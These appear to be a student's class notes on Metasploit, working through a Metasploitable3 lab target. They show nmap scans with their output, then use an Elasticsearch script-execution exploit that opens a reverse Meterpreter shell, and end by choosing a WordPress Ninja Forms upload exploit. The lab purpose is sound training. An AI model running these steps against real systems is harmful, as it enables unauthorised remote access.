3.9 KiB
| title | tags | ||
|---|---|---|---|
| metasploit |
|
service postgresql start
systemctl status postgresql
msfdb init
start the metasploit
msfconfole
show exploits
Examples:
info exploit/something
search cve:2019
Basic theory
There are vulnerabilities and payloads.
Payloads would typically give us a shell on the remote system. Android, Linux and Windows require different shells.
You can attach via 'reverse' or 'bind'. A 'bind' is best, as the user opens a port, and you connect. Mostly, you have to use 'reverse', which opens a connection to you.
Notes for Class
Victim: 172.18.3.26
nmap -Pn -sV 172.18.3.26 --script=vuln
nmap -Pn -sV 172.18.3.26
Output:
Service scan Timing: About 66.67% done; ETC: 15:28 (0:00:10 remaining)
Nmap scan report for 172.18.3.26
Host is up (0.016s latency).
Not shown: 988 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
22/tcp open ssh OpenSSH 7.1 (protocol 2.0)
80/tcp open http Microsoft IIS httpd 7.5
4848/tcp open appserv-http?
8022/tcp open oa-system?
8080/tcp open http Sun GlassFish Open Source Edition 4.0
8383/tcp open ssl/m2mservices?
9200/tcp open tcpwrapped
49153/tcp open unknown
49154/tcp open unknown
49159/tcp open unknown
49161/tcp open tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4848-TCP:V=7.80%I=7%D=9/14%Time=5D7D06F5%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,91,"HTTP/1\.1\x20302\x20Found\r\nLocation:\x20https://metasplo
SF:itable3-win2k8:4848/\r\nDate:\x20Sat,\x2014\x20Sep\x202019\x2015:27:44\
SF:x20GMT\r\nConnection:\x20close\r\nContent-Length:\x200\r\n\r\n");
MAC Address: D4:25:8B:B6:85:F5 (Intel Corporate)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Note this one:
9200/tcp open tcpwrapped
Apparently that's 'elasticsearch', so in metasploit we can do:
search elasticsearch
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/elasticsearch/indices_enum normal Yes ElasticSearch Indices Enumeration Utility
1 auxiliary/scanner/http/elasticsearch_traversal normal Yes ElasticSearch Snapshot API Directory Traversal
2 exploit/multi/elasticsearch/script_mvel_rce 2013-12-09 excellent Yes ElasticSearch Dynamic Script Arbitrary Java Execution
3 exploit/multi/elasticsearch/search_groovy_script 2015-02-11 excellent Yes ElasticSearch Search Groovy Sandbox Bypass
4 exploit/multi/misc/xdh_x_exec 2015-12-04 excellent Yes Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution
If you want to use 2, use 2 or use/multi/ela then tab out.
show options
set rhost 172.18.3.26
The remote port's already set at this point.
We've so far done use, rhost, and port.
exploit
[*] Started reverse TCP handler on 172.18.3.112:4444
[*] Trying to execute arbitrary Java...
[*] Discovering remote OS...
[+] Remote OS is 'Windows Server 2008 R2'
[*] Discovering TEMP path
[+] TEMP path identified: 'C:\Windows\TEMP\'
[*] Sending stage (53845 bytes) to 172.18.3.26
[*] Meterpreter session 1 opened (172.18.3.112:4444 -> 172.18.3.26:49311) at 2019-09-14 15:38:49 +0000
[!] This exploit may require manual cleanup of 'C:\Windows\TEMP\LXjUK.jar' on the target
dir
Next Wordpress
http://172.18.3.26:8585/wordpress/
Back to normal shell.
search wordpress ninja
use exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload